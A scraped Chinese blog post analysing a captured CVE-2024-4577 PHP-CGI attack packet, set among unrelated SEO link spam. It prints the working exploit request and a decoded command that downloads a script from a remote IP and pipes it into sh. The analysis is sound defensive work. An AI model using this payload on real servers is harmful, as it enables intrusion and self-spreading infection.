当前位置: 首页 > news >正文

搭建网站赚钱吗郴州市地图全图

搭建网站赚钱吗,郴州市地图全图,网站的彩色标签怎么做的,wordpress 登录模板一、分析数据包内容 攻击者通过URL请求POST传参的方式试图绕过IPS测试RCE漏洞的利用 URL请求中的内容进行urlcode解码后是这样的: http://资产IP/hello.world?-d allow_url_include1 -d auto_prepend_filephp://input 1. -d allow_url_include1: 使…

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include() 或 require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

        其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

        使用shell_exec()执行shell命令

X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

        通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

        把内容赋值给X

        将X的值通过管道符传递给靶机本地sh执行

        -s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

http://www.dtcms.com/a/505296.html

相关文章:

  • 常州网站快速排名优化网站搭建赚钱吗
  • 百度网站建设制作公司信息服务平台
  • 网站前瞻性_新流量机会内容建设分析淘宝关键词工具
  • 外贸企业网站制作哪家好手机微信网站怎么做的
  • 清远做网站网络科技网站建设
  • 蔡甸做网站建站哪个便宜
  • 网站建设毕业设计引言怎么写网站开发维护求职信
  • 网站购买域名吗百度网站禁止访问怎么解除
  • 做购物网站小图标怎样做电影下载网站
  • 公司网站建设的不足高平做网站
  • 公司网站建设费用计入什么科目西安 网站 制作
  • 流程网站设计阳江本地网络平台
  • 医院网站html模板噼里啪啦完整版高清免费观看
  • 关于做电影的网站设计rest api 做网站
  • 网站建设公司推网站子目录怎么做的
  • 织梦dedecms网站更换域名后文章图片路径批量修改网站建设攵金手指科杰壹陆
  • 服务器网站过多对排名企业网站建设三个原则
  • 汽车网站建设开题报告山西临汾建设局网站
  • 简单的网站建设模板东莞it外包
  • 百度SEO网站营销策划的六个步骤
  • 如何建自己网站网站收录入口申请查询
  • 网站 收录 做301计算机专业论文网站开发
  • 做网站合同封面给村里做网站
  • 程序员做情侣网站 礼物阿里巴巴司法拍卖网官网
  • 胖哥网站的建设目标交通局网站模板
  • 建设网站的一般过程七牛云最新消息
  • 网站红色模板包就业的培训学校
  • 温岭 网站建设wordpress查看站点
  • 成都网站设计得多少钱dedecms5.7环保科技公司网站模板
  • 一个空间只能放一个网站吗江苏城乡建设厅官方网站